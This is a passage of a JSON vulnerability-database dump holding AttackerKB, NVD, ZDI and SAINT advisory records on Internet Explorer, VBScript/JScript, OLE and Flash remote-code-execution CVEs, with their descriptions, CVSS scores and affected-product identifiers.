"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T01:57:58", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cScripting Engine Memory Corruption Vulnerability,\u201d a different vulnerability than CVE-2016-0187.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-0189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2020-07-30T00:00:00", "id": "AKB:193928A5-C34B-443B-8866-B66D2F427449", "href": "https://attackerkb.com/topics/obKyofAUsj/cve-2016-0189", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:27:49", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \u201cScripting Engine Memory Corruption Vulnerability,\u201d a different vulnerability than CVE-2016-0189.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2016-0187", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2020-06-05T00:00:00", "id": "AKB:39C1A10D-3FB1-476C-8129-7973A0AF496F", "href": "https://attackerkb.com/topics/bYNGQFvYHy/cve-2016-0187", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-29T05:32:53", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka \u201cInternet Explorer Use After Free Vulnerability,\u201d a different vulnerability than CVE-2013-1308 and CVE-2013-1309.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-03-11T00:00:00", "type": "attackerkb", "title": "CVE-2013-2551", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2020-07-30T00:00:00", "id": "AKB:003E78EC-23F3-48D2-9FF8-08F9B852C832", "href": "https://attackerkb.com/topics/YgZh47jMGw/cve-2013-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-14T23:27:48", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \u201cInternet Explorer Use After Free Vulnerability,\u201d a different vulnerability than CVE-2013-1309 and CVE-2013-2551.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-05-15T00:00:00", "type": "attackerkb", "title": "CVE-2013-1308", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2020-06-05T00:00:00", "id": "AKB:642B30B9-AAA1-4CE3-BB5D-13D329B72BC3", "href": "https://attackerkb.com/topics/KFy1PfsJO3/cve-2013-1308", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T14:25:24", "description": "Integer overflow in Adobe Flash Player before 18.0.0.324 and 19.x and 20.x before 20.0.0.267 on Windows and OS X and before 11.2.202.559 on Linux, Adobe AIR before 20.0.0.233, Adobe AIR SDK before 20.0.0.233, and Adobe AIR SDK & Compiler before 20.0.0.233 allows attackers to execute arbitrary code via unspecified vectors.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2015-12-28T23:59:00", "type": "cve", "title": "CVE-2015-8651", "cwe": ["CWE-189"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8651"], "modified": "2017-02-17T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:air_sdk:20.0.0.204", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:air_sdk_\\&_compiler:20.0.0.204", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:flash_player:18.0.0.268", "cpe:/a:adobe:air:20.0.0.204", "cpe:/a:adobe:flash_player:11.2.202.554"], "id": "CVE-2015-8651", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8651", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.554:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\&_compiler:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.204:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.268:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:09:08", "description": "OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka \"Windows OLE Automation Array Remote Code Execution Vulnerability.\"", "cvss3": {}, "published": "2014-11-11T22:55:00", "type": "cve", "title": "CVE-2014-6332", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2019-05-15T13:30:00", "cpe": ["cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2003:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_8:-", "cpe:/o:microsoft:windows_vista:-", "cpe:/o:microsoft:windows_rt:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2014-6332", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6332", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2003:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_8:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:13:15", "description": "JScript 9 in Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"JScript9 Memory Corruption Vulnerability.\"", "cvss3": {}, "published": "2015-07-14T21:59:00", "type": "cve", "title": "CVE-2015-2419", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2419"], "modified": "2018-10-12T22:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2015-2419", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2419", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:-:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:24", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0189.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": "CVE-2016-0187", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:microsoft:vbscript:5.8", "cpe:/a:microsoft:jscript:5.8"], "id": "CVE-2016-0187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0187", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:jscript:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:vbscript:5.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:47:26", "description": "The Microsoft (1) JScript 5.8 and (2) VBScript 5.7 and 5.8 engines, as used in Internet Explorer 9 through 11 and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0187.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-11T01:59:00", "type": "cve", "title": "CVE-2016-0189", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0187", "CVE-2016-0189"], "modified": "2018-10-12T22:11:00", "cpe": ["cpe:/a:microsoft:vbscript:5.8", "cpe:/a:microsoft:jscript:5.8", "cpe:/a:microsoft:vbscript:5.7"], "id": "CVE-2016-0189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0189", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:vbscript:5.7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:jscript:5.8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:vbscript:5.8:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:12:11", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1309 and CVE-2013-2551.", "cvss3": {}, "published": "2013-05-15T03:36:00", "type": "cve", "title": "CVE-2013-1308", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-1308", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1308", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:12:11", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1308 and CVE-2013-2551.", "cvss3": {}, "published": "2013-05-15T03:36:00", "type": "cve", "title": "CVE-2013-1309", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-1309", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1309", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:36:10", "description": "Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, as demonstrated by VUPEN during a Pwn2Own competition at CanSecWest 2013, aka \"Internet Explorer Use After Free Vulnerability,\" a different vulnerability than CVE-2013-1308 and CVE-2013-1309.", "cvss3": {}, "published": "2013-03-11T10:55:00", "type": "cve", "title": "CVE-2013-2551", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1308", "CVE-2013-1309", "CVE-2013-2551"], "modified": "2018-10-12T22:04:00", "cpe": ["cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:8", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:internet_explorer:6", "cpe:/a:microsoft:internet_explorer:7"], "id": "CVE-2013-2551", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2551", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:7:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:6:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:8:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*"]}], "zdi": [{"lastseen": "2022-01-31T21:02:52", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of VML data. The issue lies in the handling of an array when defined as an attribute of a subelement of a shape. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2013-05-29T00:00:00", "type": "zdi", "title": "(Pwn2Own) Microsoft Internet Explorer VML Parsing Remote Code Execution Vulnerabillity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2020-04-14T00:00:00", "id": "ZDI-13-102", "href": "https://www.zerodayinitiative.com/advisories/ZDI-13-102/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2021-07-29T16:40:32", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:FBD9EA13A5798F1EA68071D436F4A3DE", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:30", "description": "Added: 06/03/2013 \nCVE: [CVE-2013-2551](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551>) \nBID: [58570](<http://www.securityfocus.com/bid/58570>) \nOSVDB: [91197](<http://www.osvdb.org/91197>) \n\n\n### Background\n\n[Vector Markup Language](<http://msdn.microsoft.com/en-us/library/bb250524.aspx>) (VML) is an XML-based format for vector graphics. \n\n### Problem\n\nAn integer overflow vulnerability in `**vml.dll**` when processing `**dashstyle**` attributes of certain VML elements in a web page allows arbitrary command execution. \n\n### Resolution\n\nApply the update referenced in [Microsoft Security Bulletin 13-037](<http://www.microsoft.com/technet/security/bulletin/ms13-037.mspx>). \n\n### References\n\n<http://secunia.com/advisories/53327/> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Internet Explorer 8, 9, and 10 with KB2817183 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit in Internet Explorer 8, 9 or 10 on the target. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2013-06-03T00:00:00", "type": "saint", "title": "Internet Explorer VML Dashstyle Attributes Integer Overflow", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2551"], "modified": "2013-06-03T00:00:00", "id": "SAINT:0BF8EDFDFFD4797DCC0B0A0607B187D5", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/ie_vml_dashstyle_int_overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:55", "description": 